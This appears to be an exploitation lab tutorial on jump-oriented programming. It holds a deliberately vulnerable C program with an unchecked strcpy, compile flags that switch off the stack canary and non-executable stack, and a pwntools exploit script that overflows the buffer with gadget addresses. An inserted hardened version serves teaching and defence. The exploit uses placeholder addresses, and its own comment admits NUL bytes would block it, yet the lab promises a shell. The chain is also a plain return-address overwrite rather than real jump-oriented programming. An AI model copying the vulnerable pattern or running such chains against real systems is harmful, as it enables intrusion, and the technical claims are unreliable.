strangerRidingCaml
Jump-Oriented Programming (JOP) Lab
In this lab, we will construct JOP chains for code execution.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy copies until the first NUL byte and never
   checks the destination size, so any input longer than 63 bytes overruns
   buffer[64] and reaches the saved frame pointer and return address. */
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Program executed successfully.\n");
    return 0;
}
Save the above code to a file named vulnerable.c and compile it with the following command:
$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
The two flags disable mitigations on purpose for the lab: -fno-stack-protector removes the stack canary that would otherwise detect the overwrite, and -z execstack makes the stack executable.
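As an added example that is not part of the lab, the following C program puts the lab's strcpy-based function next to a bounds-checked replacement and records, in the comment above main, the compile flags that switch the disabled mitigations back on. BUF_SIZE matches the lab's char buffer[64]; the function names (strcpy_bytes_written, would_overflow, copy_bounded, vulnerable_function_fixed, accepts_input_of_length, would_overflow_length) are chosen here.

```c
#include <stdio.h>
#include <stdbool.h>
#include <string.h>

/* Added example, not the lab's code. BUF_SIZE matches the lab's
 * char buffer[64]; every other name is chosen for this example. */
#define BUF_SIZE 64

/* Number of bytes the lab's strcpy would write: the input plus its NUL.
 * strcpy has no notion of the destination size, so nothing stops this
 * from exceeding BUF_SIZE. */
size_t strcpy_bytes_written(const char *input) {
    return strlen(input) + 1;
}

/* True when the lab's vulnerable_function would overrun buffer[64]. */
bool would_overflow(const char *input) {
    return strcpy_bytes_written(input) > BUF_SIZE;
}

/* Hardened copy: the destination size is part of the contract and the
 * input is rejected (not silently truncated) when it does not fit. */
bool copy_bounded(char *dst, size_t dst_size, const char *input) {
    size_t len = strlen(input);
    if (dst_size == 0 || len >= dst_size) {
        return false;  /* would not fit together with the terminating NUL */
    }
    memcpy(dst, input, len + 1);
    return true;
}

/* Drop-in replacement for the lab's vulnerable_function. */
bool vulnerable_function_fixed(const char *input) {
    char buffer[BUF_SIZE];
    return copy_bounded(buffer, sizeof buffer, input);
}

/* Helpers that build a constructed all-'A' input of a given length
 * (capped at 255) so the behaviour can be checked without a command line. */
static void fill_input(char *out, size_t n) {
    if (n > 255) n = 255;
    memset(out, 'A', n);
    out[n] = '\0';
}

bool accepts_input_of_length(size_t n) {
    char input[256];
    fill_input(input, n);
    return vulnerable_function_fixed(input);
}

bool would_overflow_length(size_t n) {
    char input[256];
    fill_input(input, n);
    return would_overflow(input);
}

/* Build with the mitigations the lab disables switched back on, e.g.:
 *   gcc -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie \
 *       -Wl,-z,relro,-z,now -Wl,-z,noexecstack -o fixed fixed.c
 * -fstack-protector-strong restores the canary, -z noexecstack the
 * non-executable stack, and -pie lets ASLR randomise where the binary's
 * code (and therefore any gadget) is loaded. */
int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    printf("strcpy would write %zu bytes into a %d-byte buffer (%s)\n",
           strcpy_bytes_written(argv[1]), BUF_SIZE,
           would_overflow(argv[1]) ? "overflow" : "fits");
    if (!vulnerable_function_fixed(argv[1])) {
        fprintf(stderr, "rejected: input longer than %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    printf("Program executed successfully.\n");
    return 0;
}
```

The design choice worth noting is that copy_bounded rejects oversized input rather than truncating it with strncpy: truncation hides the error from the caller and can leave the buffer without a terminating NUL, whereas an explicit false return makes the failure visible and testable.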
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to construct JOP chains.
from pwn import *

# Specify the path to the vulnerable binary
binary_path = './vulnerable'

# Addresses of JOP gadgets (placeholders: replace them with the addresses
# of the gadgets found in the compiled binary)
gadget1_addr = 0xdeadbeef  # Example address of gadget 1
gadget2_addr = 0xdeadbeef  # Example address of gadget 2
gadget3_addr = 0xdeadbeef  # Example address of gadget 3

# Offset from the start of buffer[64] to the saved return address:
# 64 bytes of buffer plus 8 bytes of saved rbp on x86-64 without a canary
offset = 72

# Construct the JOP chain
jop_chain = [
    p64(gadget1_addr),  # Gadget 1 address (overwrites the saved return address)
    p64(gadget2_addr),  # Gadget 2 address
    p64(gadget3_addr),  # Gadget 3 address
    # Add more gadgets as needed
]

# Craft the payload: padding up to the saved return address, then the chain
payload = b'A' * offset
payload += b''.join(jop_chain)

# Launch the exploit. vulnerable.c reads its input from argv[1], not from
# stdin, so the payload must be passed as the command-line argument.
# Caveat: argv strings are NUL-terminated, so process() refuses a payload
# that contains a 0x00 byte, and strcpy would stop copying at the first
# NUL in any case; a p64() of a small address such as the placeholders
# above contains several.
p = process([binary_path, payload])
p.interactive()
Explanation of the Python script:
- We specify the path to the vulnerable binary and the addresses of the JOP gadgets.
- We construct the JOP chain by adding the gadget addresses in the desired order.
- The payload consists of padding up to the saved return address followed by the JOP chain.
- We launch the vulnerable binary with the payload so that the JOP chain is placed in memory and executed. p.interactive() lets us interact with the spawned shell.
3. Exploiting the Vulnerability:
Save the script as exploit.py and run it to exploit the buffer overflow vulnerability:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful construction of the JOP chain for code execution.